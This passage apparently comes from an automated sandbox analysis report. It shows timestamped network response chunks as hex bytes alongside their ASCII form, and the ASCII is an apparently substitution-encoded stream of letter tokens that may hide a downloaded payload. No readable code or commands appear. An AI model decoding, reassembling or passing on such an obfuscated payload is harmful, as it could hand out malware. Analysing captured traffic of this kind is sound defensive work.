                                                                                                2021-10-26 15:35:14 UTC5747INData Raw: 54 53 20 53 20 53 20 54 6e 20 54 69 53 20 67 50 20 53 20 53 20 54 20 53 20 53 20 69 53 20 54 69 20 53 20 53 20 54 53 20 53 20 67 4d 20 4d 50 69 20 4d 50 50 20 4d 50 50 20 4d 50 50 20 4d 50 69 20 54 69 20 53 20 53 20 67 4d 20 4d 20 53 20 53 20 53 20 4d 50 69 20 54 69 20 4d 20 53 20 54 54 69 20 70 4f 20 4d 50 54 20 67 20 54 54 4d 20 54 54 69 20 70 4f 20 4d 50 54 20 67 20 54 54 4d 20 69 53 20 50 55 20 53 20 53 20 54 53 20 4d 50 69 20 54 69 20 67 20 53 20 67 4d 20 67 20 53 20 53 20 53 20 4d 50 69 20 54 69 20 4d 20 53 20 54 54 69 20 70 4f 20 4d 50 54 20 67 20 54 54 4d 20 54 54 69 20 70 4f 20 4d 50 54 20 67 20 54 54 4d 20 69 53 20 50 55 20 53 20 53 20 54 53 20 4d 50 69 20 54 69 20 69 20 53 20 67 4d 20 69 20 53 20 53 20 53 20 4d 50 69 20 54 69 20 4d 20 53 20 54
                                                                                                Data Ascii: TS S S Tn TiS gP S S T S S iS Ti S S TS S gM MPi MPP MPP MPP MPi Ti S S gM M S S S MPi Ti M S TTi pO MPT g TTM TTi pO MPT g TTM iS PU S S TS MPi Ti g S gM g S S S MPi Ti M S TTi pO MPT g TTM TTi pO MPT g TTM iS PU S S TS MPi Ti i S gM i S S S MPi Ti M S T
                                                                                                2021-10-26 15:35:14 UTC5763INData Raw: 20 55 53 20 53 20 53 20 54 53 20 4d 50 69 20 54 69 20 4d 54 20 53 20 4d 50 69 20 54 4d 20 4d 54 20 53 20 50 6e 20 4d 69 20 53 20 53 20 53 20 67 4d 20 69 55 20 53 20 53 20 53 20 4d 50 69 20 54 69 20 67 20 53 20 67 4d 20 54 20 53 20 53 20 53 20 4d 50 69 20 54 69 20 53 20 53 20 50 70 20 54 54 67 20 67 20 53 20 53 20 53 20 53 20 67 4d 20 50 53 20 53 20 53 20 53 20 4d 50 69 20 54 69 20 67 20 53 20 54 54 69 20 70 53 20 4d 20 69 20 54 54 4d 20 54 54 69 20 4d 54 50 20 4d 20 69 20 54 54 4d 20 69 53 20 4d 50 20 53 20 53 20 70 20 54 54 54 20 6e 55 20 53 20 53 20 54 53 20 54 54 69 20 54 54 20 4f 20 69 20 54 54 4d 20 54 54 54 20 69 54 20 53 20 53 20 54 53 20 4d 50 69 20 54 69 20 4d 4d 20 53 20 4d 50 69 20 54 4d 20 4d 4d 20 53 20 50 6e 20 4d 69 20 53 20 53 20 53 20 67
                                                                                                Data Ascii: US S S TS MPi Ti MT S MPi TM MT S Pn Mi S S S gM iU S S S MPi Ti g S gM T S S S MPi Ti S S Pp TTg g S S S S gM PS S S S MPi Ti g S TTi pS M i TTM TTi MTP M i TTM iS MP S S p TTT nU S S TS TTi TT O i TTM TTT iT S S TS MPi Ti MM S MPi TM MM S Pn Mi S S S g
                                                                                                2021-10-26 15:35:14 UTC5779INData Raw: 20 53 20 53 20 54 6e 20 53 20 4d 4d 20 54 53 20 54 55 20 54 20 4d 50 69 20 4d 54 20 67 50 20 53 20 53 20 4d 20 54 55 20 4d 20 4d 50 69 20 4d 54 20 67 70 20 53 20 53 20 4d 20 54 55 20 54 20 4d 53 55 20 67 50 20 53 20 53 20 4d 20 69 53 20 55 55 20 53 20 53 20 54 53 20 69 53 20 54 69 53 20 53 20 53 20 54 53 20 69 53 20 54 69 54 20 53 20 53 20 54 53 20 54 4d 50 20 54 54 55 20 54 20 53 20 69 20 4d 4d 20 54 67 20 53 20 53 20 54 4d 70 20 54 54 4d 20 54 20 53 20 69 20 4d 20 54 4d 70 20 69 70 20 53 20 53 20 54 53 20 54 4d 70 20 54 54 50 20 53 20 53 20 54 53 20 54 4d 70 20 54 54 50 20 53 20 53 20 54 53 20 4d 4d 20 67 4d 20 69 20 53 20 53 20 55 20 54 4d 70 20 54 54 50 20 53 20 53 20 54 53 20 4d 53 20 54 55 20 54 20 54 55 20 4d 20 54 54 54 20 54 67 6e 20 53 20 53 20
                                                                                                Data Ascii: S S Tn S MM TS TU T MPi MT gP S S M TU M MPi MT gp S S M TU T MSU gP S S M iS UU S S TS iS TiS S S TS iS TiT S S TS TMP TTU T S i MM Tg S S TMp TTM T S i M TMp ip S S TS TMp TTP S S TS TMp TTP S S TS MM gM i S S U TMp TTP S S TS MS TU T TU M TTT Tgn S S
                                                                                                2021-10-26 15:35:14 UTC5795INData Raw: 20 53 20 53 20 67 54 20 50 53 20 54 50 6e 20 67 6e 20 67 4d 20 4d 20 53 20 53 20 53 20 67 54 20 54 53 54 20 54 50 6e 20 67 6e 20 67 4d 20 4d 20 53 20 53 20 53 20 67 54 20 50 69 20 54 50 6e 20 67 6e 20 67 4d 20 4d 20 53 20 53 20 53 20 67 54 20 50 67 20 54 50 6e 20 67 6e 20 4d 69 20 67 54 20 4f 6e 20 54 50 6e 20 67 6e 20 67 4d 20 54 20 53 20 53 20 53 20 67 54 20 69 4f 20 54 50 6e 20 67 6e 20 67 4d 20 54 20 53 20 53 20 53 20 67 54 20 50 53 20 54 50 6e 20 67 6e 20 67 4d 20 54 20 53 20 53 20 53 20 67 54 20 50 50 20 54 50 6e 20 67 6e 20 67 4d 20 54 20 53 20 53 20 53 20 67 54 20 4f 4f 20 54 50 6e 20 67 6e 20 4d 67 20 67 54 20 54 53 54 20 54 50 6e 20 67 6e 20 67 4d 20 53 20 53 20 53 20 53 20 67 54 20 4f 6e 20 54 50 6e 20 67 6e 20 67 4d 20 53 20 53 20 53 20 53 20
                                                                                                Data Ascii: S S gT PS TPn gn gM M S S S gT TST TPn gn gM M S S S gT Pi TPn gn gM M S S S gT Pg TPn gn Mi gT On TPn gn gM T S S S gT iO TPn gn gM T S S S gT PS TPn gn gM T S S S gT PP TPn gn gM T S S S gT OO TPn gn Mg gT TST TPn gn gM S S S S gT On TPn gn gM S S S S
                                                                                                2021-10-26 15:35:14 UTC5811INData Raw: 20 54 67 6e 20 54 54 20 4d 67 4d 20 54 4d 20 70 20 53 20 54 53 53 20 6e 20 4d 67 4d 20 54 4d 20 54 69 20 53 20 54 67 6e 20 55 20 54 67 67 20 54 50 20 54 69 20 53 20 54 55 6e 20 55 20 4f 69 20 54 4d 20 54 69 20 53 20 4d 53 20 55 20 4f 69 20 54 4d 20 70 20 53 20 4d 69 20 4f 20 4d 4d 55 20 54 70 20 54 53 20 53 20 4d 67 4d 20 55 20 54 69 4d 20 54 6e 20 54 53 20 53 20 53 20 4f 20 54 54 4f 20 67 20 54 69 20 53 20 54 54 70 20 55 20 4d 69 20 54 67 20 54 53 20 53 20 69 55 20 4f 20 54 54 4f 20 67 20 70 20 53 20 4d 54 4d 20 55 20 54 54 54 20 54 6e 20 70 20 53 20 55 4f 20 55 20 54 55 54 20 54 6e 20 70 20 53 20 69 55 20 55 20 4d 67 4d 20 54 4d 20 70 20 53 20 6e 53 20 55 20 4d 67 4d 20 54 4d 20 70 20 53 20 54 70 53 20 55 20 4d 4d 55 20 54 70 20 70 20 53 20 4d 50 67 20
                                                                                                Data Ascii: Tgn TT MgM TM p S TSS n MgM TM Ti S Tgn U Tgg TP Ti S TUn U Oi TM Ti S MS U Oi TM p S Mi O MMU Tp TS S MgM U TiM Tn TS S S O TTO g Ti S TTp U Mi Tg TS S iU O TTO g p S MTM U TTT Tn p S UO U TUT Tn p S iU U MgM TM p S nS U MgM TM p S TpS U MMU Tp p S MPg
                                                                                                2021-10-26 15:35:14 UTC5827INData Raw: 54 4d 20 55 70 20 54 4d 55 20 69 54 20 6e 55 20 54 4f 55 20 54 4d 20 55 70 20 54 4d 55 20 4d 54 6e 20 6e 67 20 54 4f 55 20 54 4d 20 55 70 20 54 4d 55 20 54 6e 4d 20 70 54 20 54 4f 55 20 54 4d 20 55 70 20 54 4d 55 20 4d 69 70 20 54 4d 50 20 54 4f 55 20 54 4d 20 55 70 20 54 4d 55 20 4d 50 54 20 54 69 4f 20 54 4f 55 20 54 4d 20 55 70 20 54 4d 55 20 54 53 54 20 4d 67 20 54 4f 55 20 54 4d 20 55 70 20 54 4d 55 20 67 70 20 4f 53 20 54 4f 55 20 54 4d 20 55 70 20 54 4d 55 20 4d 54 4f 20 54 50 4d 20 54 4f 55 20 54 4d 20 55 70 20 54 4d 55 20 4d 53 69 20 54 54 70 20 54 4f 55 20 54 4d 20 55 70 20 54 4d 55 20 54 70 4f 20 54 70 50 20 54 4f 55 20 54 4d 20 55 70 20 54 4d 55 20 4d 50 54 20 6e 6e 20 54 4f 55 20 54 4d 20 55 70 20 54 4d 55 20 54 50 55 20 4f 67 20 54 4f 55 20
                                                                                                Data Ascii: TM Up TMU iT nU TOU TM Up TMU MTn ng TOU TM Up TMU TnM pT TOU TM Up TMU Mip TMP TOU TM Up TMU MPT TiO TOU TM Up TMU TST Mg TOU TM Up TMU gp OS TOU TM Up TMU MTO TPM TOU TM Up TMU MSi TTp TOU TM Up TMU TpO TpP TOU TM Up TMU MPT nn TOU TM Up TMU TPU Og TOU
                                                                                                2021-10-26 15:35:14 UTC5843INData Raw: 20 4f 20 53 20 4d 4d 53 20 69 20 54 6e 69 20 6e 20 4f 20 53 20 4d 4d 69 20 69 20 54 6e 4f 20 6e 20 4f 20 53 20 4d 4d 55 20 69 20 54 55 69 20 6e 20 4f 20 53 20 4d 67 4d 20 69 20 54 55 4f 20 6e 20 4f 20 53 20 4d 67 70 20 69 20 54 4f 69 20 6e 20 4f 20 53 20 4d 69 53 20 69 20 54 4f 4f 20 6e 20 4f 20 53 20 4d 69 69 20 69 20 4d 53 69 20 6e 20 4f 20 53 20 4d 69 55 20 69 20 4d 53 4f 20 6e 20 4f 20 53 20 4d 50 4d 20 69 20 4d 54 69 20 6e 20 4f 20 53 20 53 20 50 20 4d 54 4f 20 6e 20 4f 20 53 20 69 20 50 20 4d 4d 69 20 6e 20 4f 20 53 20 55 20 50 20 4d 4d 4f 20 6e 20 4f 20 53 20 54 4d 20 50 20 4d 67 69 20 6e 20 4f 20 53 20 54 70 20 50 20 4d 67 4f 20 6e 20 4f 20 53 20 4d 53 20 50 20 4d 69 69 20 6e 20 4f 20 53 20 4d 69 20 50 20 4d 69 4f 20 6e 20 4f 20 53 20 4d 55 20 50
                                                                                                Data Ascii: O S MMS i Tni n O S MMi i TnO n O S MMU i TUi n O S MgM i TUO n O S Mgp i TOi n O S MiS i TOO n O S Mii i MSi n O S MiU i MSO n O S MPM i MTi n O S S P MTO n O S i P MMi n O S U P MMO n O S TM P Mgi n O S Tp P MgO n O S MS P Mii n O S Mi P MiO n O S MU P
                                                                                                2021-10-26 15:35:14 UTC5859INData Raw: 20 54 54 53 20 70 50 20 54 54 70 20 54 54 70 20 54 54 69 20 54 53 50 20 4f 55 20 54 54 6e 20 54 54 70 20 54 53 54 20 53 20 6e 53 20 54 53 55 20 4f 6e 20 54 53 67 20 54 54 50 20 70 50 20 54 54 70 20 54 54 70 20 54 54 69 20 54 53 50 20 4f 55 20 54 54 6e 20 54 54 70 20 54 53 54 20 53 20 54 54 50 20 54 53 54 20 54 54 70 20 4f 50 20 55 50 20 54 54 50 20 54 53 54 20 55 67 20 54 53 69 20 54 53 54 20 54 53 55 20 54 53 55 20 70 4f 20 54 4d 53 20 54 53 54 20 4f 4f 20 54 54 6e 20 54 54 70 20 54 53 54 20 53 20 55 69 20 54 54 54 20 70 70 20 54 4d 54 20 54 54 70 20 54 53 54 20 53 20 54 53 4f 20 4f 50 20 55 69 20 54 53 69 20 54 54 69 20 54 53 54 20 4f 6e 20 54 53 53 20 55 67 20 54 54 70 20 4f 6e 20 54 54 70 20 54 53 50 20 4f 4f 20 55 70 20 4f 6e 20 54 53 55 20 54 54 6e
                                                                                                Data Ascii: TTS pP TTp TTp TTi TSP OU TTn TTp TST S nS TSU On TSg TTP pP TTp TTp TTi TSP OU TTn TTp TST S TTP TST TTp OP UP TTP TST Ug TSi TST TSU TSU pO TMS TST OO TTn TTp TST S Ui TTT pp TMT TTp TST S TSO OP Ui TSi TTi TST On TSS Ug TTp On TTp TSP OO Up On TSU TTn
                                                                                                2021-10-26 15:35:14 UTC5875INData Raw: 54 69 55 20 54 4d 4f 20 4d 67 4d 20 54 69 4f 20 54 4d 4f 20 4d 67 4d 20 54 69 6e 20 54 55 70 20 4d 67 4d 20 54 69 6e 20 54 55 70 20 4d 67 4d 20 54 69 6e 20 54 55 4f 20 4d 67 4d 20 54 69 55 20 54 6e 50 20 4d 67 4d 20 54 69 55 20 54 6e 50 20 4d 67 4d 20 54 69 4f 20 54 67 54 20 4d 67 4d 20 54 69 55 20 54 6e 70 20 4d 67 4d 20 54 69 55 20 54 6e 50 20 4d 67 4d 20 54 69 55 20 54 4d 55 20 4d 67 4d 20 54 69 55 20 54 50 4d 20 4d 67 4d 20 54 69 55 20 54 4d 4f 20 53 20 4d 67 4d 20 54 50 53 20 54 6e 67 20 4d 67 4d 20 54 50 54 20 54 70 4d 20 4d 67 4d 20 54 50 54 20 54 6e 67 20 4d 67 4d 20 54 50 53 20 54 70 6e 20 4d 67 4d 20 54 50 53 20 54 6e 4d 20 4d 67 4d 20 54 50 53 20 54 70 70 20 4d 67 4d 20 54 50 54 20 54 6e 67 20 4d 67 4d 20 54 50 53 20 54 6e 50 20 4d 67 4d 20 54
                                                                                                Data Ascii: TiU TMO MgM TiO TMO MgM Tin TUp MgM Tin TUp MgM Tin TUO MgM TiU TnP MgM TiU TnP MgM TiO TgT MgM TiU Tnp MgM TiU TnP MgM TiU TMU MgM TiU TPM MgM TiU TMO S MgM TPS Tng MgM TPT TpM MgM TPT Tng MgM TPS Tpn MgM TPS TnM MgM TPS Tpp MgM TPT Tng MgM TPS TnP MgM T
                                                                                                2021-10-26 15:35:14 UTC5891INData Raw: 54 69 54 20 4d 4d 55 20 54 70 50 20 54 69 53 20 4d 4d 55 20 54 70 50 20 54 69 54 20 4d 4d 55 20 54 70 50 20 54 67 70 20 4d 4d 55 20 54 70 50 20 54 69 54 20 4d 4d 55 20 54 70 70 20 54 69 53 20 4d 4d 55 20 54 70 50 20 54 50 55 20 4d 4d 55 20 54 70 50 20 54 67 70 20 53 20 4d 4d 69 20 54 70 70 20 54 55 54 20 4d 4d 69 20 54 70 70 20 54 55 6e 20 4d 4d 69 20 54 70 70 20 54 67 67 20 4d 4d 69 20 54 70 50 20 54 4f 54 20 4d 4d 69 20 54 70 70 20 54 4d 55 20 4d 4d 69 20 54 70 70 20 54 4d 55 20 4d 4d 69 20 54 70 70 20 54 55 53 20 4d 4d 69 20 54 70 70 20 54 67 67 20 4d 4d 69 20 54 70 70 20 54 55 55 20 4d 4d 69 20 54 70 6e 20 54 4d 4f 20 4d 4d 69 20 54 70 70 20 54 55 54 20 4d 4d 69 20 54 70 70 20 54 67 4d 20 4d 4d 69 20 54 70 70 20 54 4d 55 20 4d 4d 69 20 54 70 70 20 54
                                                                                                Data Ascii: TiT MMU TpP TiS MMU TpP TiT MMU TpP Tgp MMU TpP TiT MMU Tpp TiS MMU TpP TPU MMU TpP Tgp S MMi Tpp TUT MMi Tpp TUn MMi Tpp Tgg MMi TpP TOT MMi Tpp TMU MMi Tpp TMU MMi Tpp TUS MMi Tpp Tgg MMi Tpp TUU MMi Tpn TMO MMi Tpp TUT MMi Tpp TgM MMi Tpp TMU MMi Tpp T
                                                                                                2021-10-26 15:35:14 UTC5907INData Raw: 70 20 4d 67 70 20 54 67 4f 20 54 70 54 20 4d 67 70 20 54 67 4f 20 54 70 6e 20 4d 67 70 20 54 67 4f 20 54 70 69 20 4d 67 70 20 54 67 4f 20 54 70 67 20 4d 67 70 20 54 67 4f 20 54 70 69 20 4d 67 70 20 54 67 4f 20 54 6e 6e 20 4d 67 70 20 54 67 4f 20 54 70 54 20 4d 67 70 20 54 69 53 20 54 69 55 20 4d 67 70 20 54 67 4f 20 54 70 50 20 4d 67 70 20 54 67 4f 20 54 70 70 20 4d 67 70 20 54 69 53 20 54 67 6e 20 4d 67 70 20 54 69 53 20 54 69 69 20 53 20 4d 4d 55 20 54 50 67 20 54 70 55 20 4d 4d 55 20 54 50 4d 20 54 55 69 20 4d 4d 55 20 54 50 67 20 54 6e 55 20 4d 4d 55 20 54 50 4d 20 54 55 70 20 4d 4d 55 20 54 50 4d 20 54 4f 53 20 4d 4d 55 20 54 50 4d 20 54 55 4f 20 4d 4d 55 20 54 50 67 20 54 6e 70 20 4d 4d 55 20 54 50 4d 20 54 55 69 20 4d 4d 55 20 54 50 4d 20 54 55 70
                                                                                                Data Ascii: p Mgp TgO TpT Mgp TgO Tpn Mgp TgO Tpi Mgp TgO Tpg Mgp TgO Tpi Mgp TgO Tnn Mgp TgO TpT Mgp TiS TiU Mgp TgO TpP Mgp TgO Tpp Mgp TiS Tgn Mgp TiS Tii S MMU TPg TpU MMU TPM TUi MMU TPg TnU MMU TPM TUp MMU TPM TOS MMU TPM TUO MMU TPg Tnp MMU TPM TUi MMU TPM TUp
                                                                                                2021-10-26 15:35:14 UTC5923INData Raw: 4d 67 69 20 54 6e 55 20 54 55 53 20 4d 67 69 20 54 6e 4f 20 54 69 69 20 4d 67 69 20 54 6e 4f 20 54 69 67 20 4d 67 69 20 54 6e 4f 20 54 70 70 20 4d 67 69 20 54 6e 4f 20 54 69 4f 20 4d 67 69 20 54 6e 55 20 54 6e 4f 20 4d 67 69 20 54 6e 4f 20 54 55 55 20 4d 67 69 20 54 6e 4f 20 54 50 54 20 53 20 4d 67 50 20 54 6e 55 20 54 70 4f 20 4d 67 50 20 54 6e 4f 20 54 70 53 20 4d 67 50 20 54 6e 55 20 54 55 67 20 4d 67 50 20 54 6e 55 20 54 6e 4d 20 4d 67 50 20 54 6e 55 20 54 70 6e 20 4d 67 50 20 54 6e 4f 20 54 50 4d 20 4d 67 50 20 54 6e 55 20 54 6e 53 20 4d 67 50 20 54 6e 4f 20 54 50 70 20 4d 67 50 20 54 6e 55 20 54 6e 54 20 4d 67 50 20 54 6e 55 20 54 70 55 20 4d 67 50 20 54 6e 55 20 54 4f 54 20 4d 67 50 20 54 6e 55 20 54 70 70 20 4d 67 50 20 54 6e 4f 20 54 6e 67 20 4d
                                                                                                Data Ascii: Mgi TnU TUS Mgi TnO Tii Mgi TnO Tig Mgi TnO Tpp Mgi TnO TiO Mgi TnU TnO Mgi TnO TUU Mgi TnO TPT S MgP TnU TpO MgP TnO TpS MgP TnU TUg MgP TnU TnM MgP TnU Tpn MgP TnO TPM MgP TnU TnS MgP TnO TPp MgP TnU TnT MgP TnU TpU MgP TnU TOT MgP TnU Tpp MgP TnO Tng M
                                                                                                2021-10-26 15:35:14 UTC5939INData Raw: 67 20 54 67 4d 20 54 6e 54 20 4d 67 67 20 54 67 4d 20 54 6e 4d 20 4d 67 67 20 54 67 4d 20 54 6e 54 20 4d 67 67 20 54 67 67 20 54 67 50 20 4d 67 67 20 54 67 67 20 54 50 70 20 4d 67 67 20 54 67 4d 20 54 6e 54 20 4d 67 67 20 54 67 4d 20 54 55 4f 20 4d 67 67 20 54 67 67 20 54 50 4f 20 4d 67 67 20 54 67 4d 20 54 6e 6e 20 4d 67 67 20 54 67 4d 20 54 6e 54 20 4d 67 67 20 54 67 67 20 54 70 53 20 4d 67 67 20 54 67 4d 20 54 55 4f 20 4d 67 67 20 54 67 67 20 54 50 4f 20 53 20 4d 67 67 20 54 69 67 20 54 6e 53 20 4d 67 67 20 54 69 69 20 54 6e 70 20 4d 67 67 20 54 69 69 20 54 69 69 20 4d 67 67 20 54 69 67 20 54 6e 70 20 4d 67 67 20 54 69 67 20 54 6e 54 20 4d 67 67 20 54 69 69 20 54 70 70 20 4d 67 67 20 54 69 69 20 54 69 69 20 4d 67 67 20 54 69 67 20 54 70 4f 20 4d 67 67
                                                                                                Data Ascii: g TgM TnT Mgg TgM TnM Mgg TgM TnT Mgg Tgg TgP Mgg Tgg TPp Mgg TgM TnT Mgg TgM TUO Mgg Tgg TPO Mgg TgM Tnn Mgg TgM TnT Mgg Tgg TpS Mgg TgM TUO Mgg Tgg TPO S Mgg Tig TnS Mgg Tii Tnp Mgg Tii Tii Mgg Tig Tnp Mgg Tig TnT Mgg Tii Tpp Mgg Tii Tii Mgg Tig TpO Mgg
                                                                                                2021-10-26 15:35:14 UTC5955INData Raw: 53 20 54 50 6e 20 4d 67 54 20 54 67 53 20 54 50 53 20 4d 67 54 20 54 67 53 20 54 67 55 20 4d 67 54 20 54 4d 4f 20 54 70 69 20 4d 67 54 20 54 67 53 20 54 50 67 20 4d 67 54 20 54 67 53 20 54 69 55 20 4d 67 54 20 54 67 53 20 54 50 54 20 4d 67 54 20 54 4d 4f 20 54 70 50 20 53 20 4d 67 53 20 54 67 70 20 54 69 70 20 4d 67 53 20 54 67 50 20 54 55 50 20 4d 67 53 20 54 67 50 20 54 70 69 20 4d 67 53 20 54 67 50 20 54 50 4f 20 4d 67 53 20 54 67 70 20 54 69 69 20 4d 67 53 20 54 67 50 20 54 70 70 20 4d 67 53 20 54 67 70 20 54 69 4f 20 4d 67 53 20 54 67 50 20 54 70 4d 20 4d 67 53 20 54 67 50 20 54 6e 6e 20 4d 67 53 20 54 67 70 20 54 70 4d 20 4d 67 53 20 54 67 50 20 54 6e 70 20 4d 67 53 20 54 67 70 20 54 69 67 20 4d 67 53 20 54 67 70 20 54 69 55 20 4d 67 53 20 54 67 50
                                                                                                Data Ascii: S TPn MgT TgS TPS MgT TgS TgU MgT TMO Tpi MgT TgS TPg MgT TgS TiU MgT TgS TPT MgT TMO TpP S MgS Tgp Tip MgS TgP TUP MgS TgP Tpi MgS TgP TPO MgS Tgp Tii MgS TgP Tpp MgS Tgp TiO MgS TgP TpM MgS TgP Tnn MgS Tgp TpM MgS TgP Tnp MgS Tgp Tig MgS Tgp TiU MgS TgP
                                                                                                2021-10-26 15:35:14 UTC5971INData Raw: 4d 20 4d 67 55 20 54 6e 6e 20 54 70 4d 20 4d 67 55 20 54 6e 6e 20 54 69 70 20 4d 67 55 20 54 6e 55 20 54 67 69 20 4d 67 55 20 54 6e 55 20 54 67 69 20 4d 67 55 20 54 6e 6e 20 54 6e 50 20 4d 67 55 20 54 6e 6e 20 54 50 4d 20 4d 67 55 20 54 6e 6e 20 54 6e 54 20 53 20 4d 67 69 20 54 6e 55 20 54 6e 53 20 4d 67 69 20 54 6e 6e 20 54 55 50 20 4d 67 69 20 54 6e 6e 20 54 4f 53 20 4d 67 69 20 54 6e 55 20 54 55 6e 20 4d 67 69 20 54 6e 6e 20 54 55 67 20 4d 67 69 20 54 6e 6e 20 54 55 4f 20 4d 67 69 20 54 6e 6e 20 54 55 67 20 4d 67 69 20 54 6e 6e 20 54 55 6e 20 4d 67 69 20 54 6e 6e 20 54 4f 53 20 4d 67 69 20 54 6e 55 20 54 50 55 20 4d 67 69 20 54 6e 6e 20 54 55 6e 20 4d 67 69 20 54 6e 6e 20 54 55 69 20 4d 67 69 20 54 6e 55 20 54 6e 50 20 4d 67 69 20 54 6e 55 20 54 69 50
                                                                                                Data Ascii: M MgU Tnn TpM MgU Tnn Tip MgU TnU Tgi MgU TnU Tgi MgU Tnn TnP MgU Tnn TPM MgU Tnn TnT S Mgi TnU TnS Mgi Tnn TUP Mgi Tnn TOS Mgi TnU TUn Mgi Tnn TUg Mgi Tnn TUO Mgi Tnn TUg Mgi Tnn TUn Mgi Tnn TOS Mgi TnU TPU Mgi Tnn TUn Mgi Tnn TUi Mgi TnU TnP Mgi TnU TiP
                                                                                                2021-10-26 15:35:14 UTC5987INData Raw: 6e 20 54 67 50 20 54 4d 4f 20 4d 67 6e 20 54 67 50 20 54 6e 4f 20 53 20 4d 67 50 20 54 69 67 20 54 6e 6e 20 4d 67 50 20 54 69 69 20 54 70 54 20 4d 67 50 20 54 69 69 20 54 70 4d 20 4d 67 50 20 54 69 69 20 54 67 6e 20 4d 67 50 20 54 69 69 20 54 70 69 20 4d 67 50 20 54 69 67 20 54 6e 55 20 4d 67 50 20 54 69 67 20 54 6e 4f 20 4d 67 50 20 54 69 67 20 54 6e 70 20 4d 67 50 20 54 69 67 20 54 55 4d 20 4d 67 50 20 54 69 69 20 54 70 54 20 4d 67 50 20 54 69 69 20 54 6e 50 20 4d 67 50 20 54 69 67 20 54 6e 50 20 4d 67 50 20 54 69 69 20 54 6e 53 20 4d 67 50 20 54 69 69 20 54 6e 70 20 4d 67 50 20 54 69 69 20 54 6e 4f 20 53 20 4d 67 70 20 54 69 50 20 54 70 6e 20 4d 67 70 20 54 69 69 20 54 55 53 20 4d 67 70 20 54 69 50 20 54 6e 53 20 4d 67 70 20 54 69 50 20 54 70 6e 20 4d
                                                                                                Data Ascii: n TgP TMO Mgn TgP TnO S MgP Tig Tnn MgP Tii TpT MgP Tii TpM MgP Tii Tgn MgP Tii Tpi MgP Tig TnU MgP Tig TnO MgP Tig Tnp MgP Tig TUM MgP Tii TpT MgP Tii TnP MgP Tig TnP MgP Tii TnS MgP Tii Tnp MgP Tii TnO S Mgp TiP Tpn Mgp Tii TUS Mgp TiP TnS Mgp TiP Tpn M
                                                                                                2021-10-26 15:35:14 UTC6003INData Raw: 54 69 4f 20 54 4d 4f 20 4d 67 50 20 54 69 6e 20 54 4f 54 20 4d 67 50 20 54 69 6e 20 54 4f 54 20 4d 67 50 20 54 69 6e 20 54 4f 54 20 4d 67 50 20 54 69 6e 20 54 4f 53 20 4d 67 50 20 54 69 6e 20 54 55 6e 20 4d 67 50 20 54 69 55 20 54 69 70 20 4d 67 50 20 54 69 6e 20 54 55 69 20 4d 67 50 20 54 69 55 20 54 69 4f 20 4d 67 50 20 54 69 55 20 54 6e 4d 20 4d 67 50 20 54 69 55 20 54 6e 4d 20 4d 67 50 20 54 69 6e 20 54 55 70 20 53 20 4d 4d 50 20 54 69 55 20 54 70 70 20 4d 4d 50 20 54 69 55 20 54 55 54 20 4d 4d 50 20 54 69 55 20 54 67 53 20 4d 4d 50 20 54 69 6e 20 54 4f 54 20 4d 4d 50 20 54 69 55 20 54 4f 54 20 4d 4d 50 20 54 69 55 20 54 6e 70 20 4d 4d 50 20 54 69 55 20 54 67 4d 20 4d 4d 50 20 54 69 55 20 54 55 53 20 4d 4d 50 20 54 69 55 20 54 67 54 20 4d 4d 50 20 54
                                                                                                Data Ascii: TiO TMO MgP Tin TOT MgP Tin TOT MgP Tin TOT MgP Tin TOS MgP Tin TUn MgP TiU Tip MgP Tin TUi MgP TiU TiO MgP TiU TnM MgP TiU TnM MgP Tin TUp S MMP TiU Tpp MMP TiU TUT MMP TiU TgS MMP Tin TOT MMP TiU TOT MMP TiU Tnp MMP TiU TgM MMP TiU TUS MMP TiU TgT MMP T
                                                                                                2021-10-26 15:35:14 UTC6019INData Raw: 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 54 54 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 55 53 20 53 20 70 50 20 53 20 6e 6e 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20
                                                                                                Data Ascii: pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S pP S TTO S pP S pP S pP S US S pP S nn S pP S pP S pP S pP S pP S pP
                                                                                                2021-10-26 15:35:14 UTC6035INData Raw: 50 20 53 20 55 4f 20 53 20 69 4f 20 53 20 6e 55 20 53 20 54 54 70 20 53 20 6e 53 20 53 20 6e 54 20 53 20 6e 70 20 53 20 54 4d 4d 20 53 20 54 54 55 20 53 20 50 6e 20 53 20 55 54 20 53 20 70 4f 20 53 20 6e 67 20 53 20 50 53 20 53 20 6e 53 20 53 20 54 54 70 20 53 20 55 53 20 53 20 69 6e 20 53 20 69 67 20 53 20 69 6e 20 53 20 69 4f 20 53 20 70 6e 20 53 20 6e 70 20 53 20 55 4d 20 53 20 55 54 20 53 20 54 53 70 20 53 20 54 54 54 20 53 20 54 4d 4d 20 53 20 54 53 70 20 53 20 69 55 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 67 20 53 20 54 54 70 20 53 20 54 53 53 20 53 20 69 67 20 53 20 70 55 20 53 20 54 54 70 20 53 20 54 53 53 20 53 20 69 6e 20 53 20 6e 4d 20 53 20 54 4d 54 20 53 20 55 4d 20 53 20 55 55 20 53 20 69 4f 20 53 20 54 54 55 20 53 20 6e 69 20 53 20 54 54
                                                                                                Data Ascii: P S UO S iO S nU S TTp S nS S nT S np S TMM S TTU S Pn S UT S pO S ng S PS S nS S TTp S US S in S ig S in S iO S pn S np S UM S UT S TSp S TTT S TMM S TSp S iU S pP S pP S ng S TTp S TSS S ig S pU S TTp S TSS S in S nM S TMT S UM S UU S iO S TTU S ni S TT


                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
